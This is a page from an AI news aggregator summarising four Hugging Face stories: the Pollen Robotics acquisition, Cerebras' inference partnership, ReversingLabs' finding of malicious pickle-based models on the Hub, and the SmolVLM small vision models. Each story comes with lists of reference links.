News from the AI & ML world

DeeperML - #huggingface

@the-decoder.com //

Hugging Face Boosts Open-Source Robotics with Acquisition - Hugging Face is set to enhance open source robotics by acquiring Pollen Robotics, aiming to make robotics more accessible through transparency and community-driven development.
Hugging Face, a leading open-source AI platform, has announced its acquisition of Pollen Robotics, a French startup specializing in robotics. This strategic move aims to expand open-source robotics efforts and make robotics more accessible through transparency and community-driven development. The acquisition includes Pollen’s humanoid robot Reachy 2, which Hugging Face plans to further develop as an open-source hardware and software platform. The company believes this initiative will lower technical barriers and accelerate innovation in the field, positioning open source as a vital solution to industry challenges.

Hugging Face's CEO, Clément Delangue, emphasizes the critical importance of transparency in robotics, particularly when dealing with physical systems interacting in real-world environments. Open-source frameworks, featuring publicly available code and hardware documentation, are seen as a means to build trust and foster collaboration within the robotics community. Pollen CEO Matthieu Lapeyre views the acquisition as an opportunity to make robotics more practical and accessible, offering a transparent, community-driven alternative to the proprietary approaches often adopted by large, well-funded companies in the sector.

Reachy 2 is already being utilized by various AI companies in research settings, demonstrating its capabilities in performing basic tasks such as picking up objects. Hugging Face intends to release detailed schematics, parts lists, and 3D models of Reachy 2, enabling developers to repair components or make custom modifications. By fostering an open and collaborative environment, Hugging Face hopes to counterbalance inflated expectations in the robotics sector, where public demonstrations often depict ideal scenarios, and unlock the full potential of AI-driven robotics for broader applications.

Recommended read:
References :
  • Analytics India Magazine: Hugging Face Acquires Pollen Robotics to Expand Open-Source Robotics Efforts
  • the-decoder.com: Hugging Face bets on open source to solve robotics' transparency problem
  • WIRED: Hugging Face acquires open source robot startup
  • Maginative: Hugging Face Steps Into Hardware With Pollen Robotics Acquisition
  • The Robot Report: Hugging Face bridges gap between AI and physical world with Pollen Robotics acquisition
Jaime Hampton@AIwire //

Cerebras Scales AI Inference with Hugging Face Partnership - Cerebras Systems expands AI inference capabilities via a Hugging Face partnership and six new AI datacenters, increasing capacity to handle high-speed inference workloads and granting access to five million developers.
References: venturebeat.com , AIwire ,
Cerebras Systems is expanding its role in AI inference with a new partnership with Hugging Face and the launch of six new AI datacenters across North America and Europe. The partnership with Hugging Face integrates Cerebras' inference capabilities into the Hugging Face Hub, granting access to the platform's five million developers. This integration allows developers to use Cerebras as their inference provider for models like Llama 3.3 70B, powered by the Cerebras CS-3 systems.

Cerebras is also launching six new AI inference datacenters located across North America and Europe. Once fully operational, these centers are expected to significantly increase Cerebras' capacity to handle high-speed inference workloads, supporting over 40 million Llama 70B tokens per second. The expansion includes facilities in Dallas, Minneapolis, Oklahoma City, Montreal, New York and France, with 85% of the total capacity located in the United States.

Recommended read:
References :
  • venturebeat.com: Cerebras just announced 6 new AI datacenters that process 40M tokens per second — and it could be bad news for Nvidia
  • AIwire: Cerebras Scales AI Inference with Hugging Face Partnership and Datacenter Expansion
  • THE DECODER: Nvidia rival Cerebras opens six data centers for rapid AI inference
karlo.zanki@reversinglabs.com (Karlo Zanki)@Blog (Main) //

Malicious ML Models on Hugging Face Exploit Pickle Format - Researchers identified malicious machine learning models on Hugging Face using 'broken' pickle files to evade detection and execute Python code during ML model deserialization.
Cybersecurity researchers have identified malicious machine learning (ML) models on Hugging Face, a popular platform for sharing and collaborating on ML projects. The models leverage a novel attack technique called "nullifAI," which uses "broken" pickle files to evade detection. This method abuses the Pickle file serialization process, allowing Python code execution during ML model deserialization. The malicious models, which resemble proof-of-concept models, were initially not flagged as unsafe by Hugging Face's Picklescan security tool.

Researchers from ReversingLabs discovered two such models on Hugging Face containing malicious code. The nullifAI attack exploits differences in compression format with PyTorch and a security issue preventing proper scanning of Pickle files. The malicious payload in both cases was a platform-aware reverse shell that connects to a hard-coded IP address. The Hugging Face security team has since removed the malicious models and improved Picklescan's detection capabilities.

Recommended read:
References :
  • Blog (Main): Researchers from ReversingLabs recently discovered two Hugging Face models containing malicious code. The nullifAI attack involves abusing Pickle file serialization.
  • gbhackers.com: Developers Beware! Malicious ML Models Found on Hugging Face Platform
  • The Hacker News: Malicious ML Models on Hugging Face Leverage Broken Pickle Format to Evade Detection
  • www.csoonline.com: Attackers hide malicious code in Hugging Face AI model Pickle files
  • ciso2ciso.com: Malicious ML Models on Hugging Face Exploit Novel Attack Technique – Source: www.infosecurity-magazine.com
  • cyberscoop.com: Hugging Face platform continues to be plagued by vulnerable ‘pickles’
  • Anonymous ???????? :af:: Cybersecurity researchers have uncovered two malicious machine learning (ML) models on Hugging Face that leveraged an unusual technique of "broken" pickle files to evade detection.
  • ciso2ciso.com: Security Week - Malicious AI Models on Hugging Face Exploit Novel Attack Technique
  • Threats | CyberScoop: Cyberscoop - Hugging Face platform continues to be plagued by vulnerable ‘pickles’
  • gbhackers.com: Developers Beware! Malicious ML Models Found on Hugging Face Platform
  • Anonymous ???????? :af:: Cybersecurity researchers have uncovered two malicious machine learning (ML) models on Hugging Face that leveraged an unusual technique of "broken" pickle files to evade detection.
  • Help Net Security: Researchers have spotted two machine learning (ML) models containing malicious code on Hugging Face Hub, the popular online repository for datasets and pre-trained models.
  • www.helpnetsecurity.com: Researchers have spotted two machine learning (ML) models containing malicious code on Hugging Face Hub, the popular online repository for datasets and pre-trained models.
  • www.scworld.com: Security news about hugging face with malicious ai models
  • : The abuse of Pickle, a popular Python module that many teams use for serializing and deserializing ML model data
  • Virus Bulletin: Virus Bulletin reports on researchers from ReversingLabs discovering two Hugging Face models containing malicious code.
@siliconangle.com //

Hugging Face Releases Small Vision Models - Hugging Face released SmolVLM-256M and SmolVLM-500M, compact AI models for analyzing images, videos, and text on devices with limited resources.
Hugging Face has unveiled two new compact AI models, SmolVLM-256M and SmolVLM-500M, designed to analyze images, short videos, and text on devices with limited resources. These models, requiring less than 1GB of RAM, are intended for use in constrained environments where computational power is scarce, such as laptops with limited RAM. The models are not only small in size, but also in parameter count, with 256 million and 500 million parameters, respectively. The team states that they are ideal for developers looking to process large amounts of data very cheaply.

These new models can perform tasks like describing images or video clips and answering questions about PDFs, including scanned text and charts. Hugging Face used datasets called The Cauldron, a collection of 50 high-quality image and text datasets, and Docmatix, a set of file scans paired with detailed captions, to train SmolVLM-256M and SmolVLM-500M. The company also claims that SmolVLM-256M and SmolVLM-500M outperform the larger Idefics 80B model on benchmarks such as AI2D, which evaluates the ability to analyze science diagrams. The models are available on the web and for download with an Apache 2.0 license.

Recommended read:
References :
  • www.techmeme.com: Hugging Face releases SmolVLM-256M and SmolVLM-500M, claiming they can analyze images, short videos, and text on "constrained devices" with under ~1GB of RAM (Kyle Wiggers/TechCrunch)
  • siliconangle.com: Hugging Face open-sources world’s smallest vision language model
  • techcrunch.com: Hugging Face releases SmolVLM-256M and SmolVLM-500M, claiming they can analyze images, short videos, and text on "constrained devices" with under ~1GB of RAM (Kyle Wiggers/TechCrunch)
  • Techmeme: Hugging Face releases SmolVLM-256M and SmolVLM-500M, claiming they can analyze images, short videos, and text on "constrained devices" with under ~1GB of RAM
  • SiliconANGLE: Hugging Face open-sources world’s smallest vision language model

Benchmarks

Blogs

Research Tools